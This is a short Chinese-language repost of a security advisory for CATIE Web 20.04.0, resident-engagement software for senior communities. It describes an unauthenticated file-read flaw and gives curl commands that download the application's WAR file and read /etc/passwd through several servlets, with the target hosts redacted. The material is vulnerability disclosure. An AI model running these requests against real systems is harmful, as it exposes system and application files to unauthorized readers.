原文链接:
https://bishopfox.com/blog/catie-web-v-20-04-0-advisory
前言:
CATIE是一款通信,自助服务和居民参与软件,可帮助老年人以各种方式与社区建立联系。该产品引入了一种有效的方法,让居民了解社区事件,同时让员工每天了解居民的需求。
官方网站:
https://www.statussolutions.com/resident-engagement-catie
漏洞描述:
未经身份验证的远程攻击者通过/catie/MultiPartUtilityServlet 可以读取系统文件。
影响版本:
CATIE 20.04.0版本
过程:
相关代码:
代码语言:javascript复制$ curl -sk 'https://[REDACTED]/catie/MultiPartUtilityServlet?file=catie.war&dir=/home/apache-tomcat/webapps/' --output catie.war
$ unzip catie.war
...omitted for brevity...
$ ls
admin appadmin catie.war device global META-INF sara WEB-INF$ curl -sk 'https://[REDACTED]/catie/ImageGrabberServlet?imageName=/passwd&imageDir=/etc'
$ curl -sk 'https://[REDACTED]/catie/AudioStream?file=/etc/passwd'
$ curl -sk 'https://[REDACTED]/catie/device/carousel/tv/Filewriter?filename=/etc/passwd'
